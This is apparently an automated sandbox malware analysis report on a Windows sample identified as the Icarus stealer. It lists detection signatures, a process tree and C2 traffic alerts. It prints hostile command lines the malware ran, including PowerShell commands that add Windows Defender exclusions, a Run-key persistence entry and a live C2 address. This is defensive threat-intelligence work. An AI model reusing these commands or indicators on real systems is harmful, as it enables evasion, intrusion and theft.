Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
licarisan_api.exe

Overview

General Information

Sample name:licarisan_api.exe
Analysis ID:1526431
MD5:65a683124fc4ca1839e95322370e2b0d
SHA1:7a7eafcfa4349e40cb15ab30b5c64d3415e60b96
SHA256:3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f
Tags:exeuser-aachum
Infos:

Detection

Icarus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Icarus stealer
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code contains suspicious base64 encoded strings
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Sigma detected: Explorer NOUACCHECK Flag
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • licarisan_api.exe (PID: 3632 cmdline: "C:\Users\user\Desktop\licarisan_api.exe" MD5: 65A683124FC4CA1839E95322370E2B0D)
    • csc.exe (PID: 7584 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • explorer.exe (PID: 7624 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
      • cvtres.exe (PID: 7640 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7884 cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8000 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 5660 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 7936 cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8016 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • explorer.exe (PID: 7648 cmdline: C:\Windows\explorer.exe /NoUACCheck MD5: 662F4F92FDE3557E86D110526BB578D5)
  • explorer.exe (PID: 7800 cmdline: C:\Windows\explorer.exe /NoUACCheck MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
IcarusIcarus is a modular stealer software, written in .NET. One module is the open source r77 rootkit.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.icarus

Malware Configuration

Threatname: Icarus

{"C2 url": "193.142.146.64:8880", "Identifier": "ICARUS_Client"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_IcarusYara detected Icarus stealerJoe Security
    0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_IcarusYara detected Icarus stealerJoe Security
      Process Memory Space: csc.exe PID: 7584JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: csc.exe PID: 7584JoeSecurity_IcarusYara detected Icarus stealerJoe Security
          Process Memory Space: cvtres.exe PID: 7640JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.cvtres.exe.400000.0.unpackJoeSecurity_IcarusYara detected Icarus stealerJoe Security
              10.2.csc.exe.852cc18.1.unpackJoeSecurity_IcarusYara detected Icarus stealerJoe Security
                10.2.csc.exe.852cc18.1.raw.unpackJoeSecurity_IcarusYara detected Icarus stealerJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Explorer NOUACCHECK Flag
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\explorer.exe /NoUACCheck, CommandLine: C:\Windows\explorer.exe /NoUACCheck, CommandLine|base64offset|contains: y, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\explorer.exe /NoUACCheck, ProcessId: 7648, ProcessName: explorer.exe
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, ParentProcessId: 7640, ParentProcessName: cvtres.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit, ProcessId: 7884, ProcessName: cmd.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Music\OcoulsUpdater\EyesUpdater.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\licarisan_api.exe, ProcessId: 3632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OcuulusUpdater
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, ParentProcessId: 7640, ParentProcessName: cvtres.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit, ProcessId: 7884, ProcessName: cmd.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, CommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7884, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, ProcessId: 8000, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-05T16:46:40.239620+020020378361Malware Command and Control Activity Detected192.168.2.749803193.142.146.648880TCP
                  2024-10-05T16:46:42.481091+020020378361Malware Command and Control Activity Detected192.168.2.749815193.142.146.648880TCP
                  2024-10-05T16:46:45.163501+020020378361Malware Command and Control Activity Detected192.168.2.749832193.142.146.648880TCP
                  2024-10-05T16:46:47.803365+020020378361Malware Command and Control Activity Detected192.168.2.749849193.142.146.648880TCP
                  2024-10-05T16:46:50.585727+020020378361Malware Command and Control Activity Detected192.168.2.749861193.142.146.648880TCP
                  2024-10-05T16:46:53.572280+020020378361Malware Command and Control Activity Detected192.168.2.750328193.142.146.648880TCP
                  2024-10-05T16:46:56.384698+020020378361Malware Command and Control Activity Detected192.168.2.750342193.142.146.648880TCP
                  2024-10-05T16:46:58.687896+020020378361Malware Command and Control Activity Detected192.168.2.750363193.142.146.648880TCP
                  2024-10-05T16:47:01.498487+020020378361Malware Command and Control Activity Detected192.168.2.750380193.142.146.648880TCP
                  2024-10-05T16:47:04.168605+020020378361Malware Command and Control Activity Detected192.168.2.750397193.142.146.648880TCP
                  2024-10-05T16:47:06.815409+020020378361Malware Command and Control Activity Detected192.168.2.750414193.142.146.648880TCP
                  2024-10-05T16:47:09.479387+020020378361Malware Command and Control Activity Detected192.168.2.750431193.142.146.648880TCP
                  2024-10-05T16:47:13.121801+020020378361Malware Command and Control Activity Detected192.168.2.750444193.142.146.648880TCP
                  2024-10-05T16:47:15.770445+020020378361Malware Command and Control Activity Detected192.168.2.750449193.142.146.648880TCP
                  2024-10-05T16:47:18.441887+020020378361Malware Command and Control Activity Detected192.168.2.750451193.142.146.648880TCP
                  2024-10-05T16:47:21.431202+020020378361Malware Command and Control Activity Detected192.168.2.750453193.142.146.648880TCP
                  2024-10-05T16:47:24.141651+020020378361Malware Command and Control Activity Detected192.168.2.750455193.142.146.648880TCP
                  2024-10-05T16:47:26.780755+020020378361Malware Command and Control Activity Detected192.168.2.750457193.142.146.648880TCP
                  2024-10-05T16:47:30.387265+020020378361Malware Command and Control Activity Detected192.168.2.750459193.142.146.648880TCP
                  2024-10-05T16:47:33.183372+020020378361Malware Command and Control Activity Detected192.168.2.750461193.142.146.648880TCP
                  2024-10-05T16:47:35.647615+020020378361Malware Command and Control Activity Detected192.168.2.750463193.142.146.648880TCP
                  2024-10-05T16:47:38.300123+020020378361Malware Command and Control Activity Detected192.168.2.750465193.142.146.648880TCP
                  2024-10-05T16:47:40.935510+020020378361Malware Command and Control Activity Detected192.168.2.750467193.142.146.648880TCP
                  2024-10-05T16:47:43.576008+020020378361Malware Command and Control Activity Detected192.168.2.750469193.142.146.648880TCP
                  2024-10-05T16:47:46.208206+020020378361Malware Command and Control Activity Detected192.168.2.750471193.142.146.648880TCP
                  2024-10-05T16:47:48.934070+020020378361Malware Command and Control Activity Detected192.168.2.750473193.142.146.648880TCP
                  2024-10-05T16:47:51.581575+020020378361Malware Command and Control Activity Detected192.168.2.750475193.142.146.648880TCP
                  2024-10-05T16:47:54.225238+020020378361Malware Command and Control Activity Detected192.168.2.750477193.142.146.648880TCP
                  2024-10-05T16:47:57.019805+020020378361Malware Command and Control Activity Detected192.168.2.750479193.142.146.648880TCP
                  2024-10-05T16:48:00.304354+020020378361Malware Command and Control Activity Detected192.168.2.750481193.142.146.648880TCP
                  2024-10-05T16:48:02.197951+020020378361Malware Command and Control Activity Detected192.168.2.750483193.142.146.648880TCP
                  2024-10-05T16:48:04.824904+020020378361Malware Command and Control Activity Detected192.168.2.750485193.142.146.648880TCP
                  2024-10-05T16:48:07.476703+020020378361Malware Command and Control Activity Detected192.168.2.750487193.142.146.648880TCP
                  2024-10-05T16:48:10.104002+020020378361Malware Command and Control Activity Detected192.168.2.750489193.142.146.648880TCP
                  2024-10-05T16:48:12.680846+020020378361Malware Command and Control Activity Detected192.168.2.750491193.142.146.648880TCP
                  2024-10-05T16:48:15.229115+020020378361Malware Command and Control Activity Detected192.168.2.750493193.142.146.648880TCP
                  2024-10-05T16:48:17.736987+020020378361Malware Command and Control Activity Detected192.168.2.750495193.142.146.648880TCP
                  2024-10-05T16:48:22.877229+020020378361Malware Command and Control Activity Detected192.168.2.750499193.142.146.648880TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-05T16:46:45.158427+020028033053Unknown Traffic192.168.2.74983334.117.59.8180TCP
                  2024-10-05T16:47:09.528082+020028033053Unknown Traffic192.168.2.75043234.117.59.8180TCP
                  2024-10-05T16:47:15.809463+020028033053Unknown Traffic192.168.2.75045034.117.59.8180TCP
                  2024-10-05T16:47:21.481284+020028033053Unknown Traffic192.168.2.75045434.117.59.8180TCP
                  2024-10-05T16:47:48.926986+020028033053Unknown Traffic192.168.2.75047434.117.59.8180TCP
                  2024-10-05T16:48:00.299639+020028033053Unknown Traffic192.168.2.75048234.117.59.8180TCP
                  2024-10-05T16:48:02.247009+020028033053Unknown Traffic192.168.2.75048434.117.59.8180TCP
                  2024-10-05T16:48:04.820098+020028033053Unknown Traffic192.168.2.75048634.117.59.8180TCP
                  2024-10-05T16:48:15.325187+020028033053Unknown Traffic192.168.2.75049434.117.59.8180TCP
                  2024-10-05T16:48:19.767983+020028033053Unknown Traffic192.168.2.75049834.117.59.8180TCP
                  2024-10-05T16:48:22.918949+020028033053Unknown Traffic192.168.2.75050034.117.59.8180TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: cvtres.exe.7640.12.memstrminMalware Configuration Extractor: Icarus {"C2 url": "193.142.146.64:8880", "Identifier": "ICARUS_Client"}
                  Multi AV Scanner detection for submitted file
                  Source: licarisan_api.exeReversingLabs: Detection: 21%
                  Source: licarisan_api.exeVirustotal: Detection: 33%Perma Link
                  Yara detected Icarus stealer
                  Source: Yara matchFile source: 12.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.csc.exe.852cc18.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.csc.exe.852cc18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: csc.exe PID: 7584, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 7640, type: MEMORYSTR
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Source: licarisan_api.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: Binary string: H:\HVNC VELOCITY\Velocity (2)\Velocity\HVNC Source\NewDLL\DLL\obj\Release\DLL.pdb source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: H:\HVNC VELOCITY\Velocity (2)\Velocity\HVNC Source\NewDLL\DLL\obj\Release\DLL.pdbJ source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:49803 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:49861 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:49832 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50328 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50363 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50342 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50397 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:49849 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50380 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:49815 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50414 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50431 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50455 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50449 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50495 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50491 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50485 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50487 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50457 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50475 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50499 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50451 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50461 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50444 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50465 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50463 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50471 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50467 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50493 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50479 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50481 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50469 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50483 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50459 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50477 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50489 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50473 -> 193.142.146.64:8880
                  Source: Network trafficSuricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:50453 -> 193.142.146.64:8880
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 193.142.146.64:8880
                  Source: global trafficTCP traffic: 192.168.2.7:49803 -> 193.142.146.64:8880
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
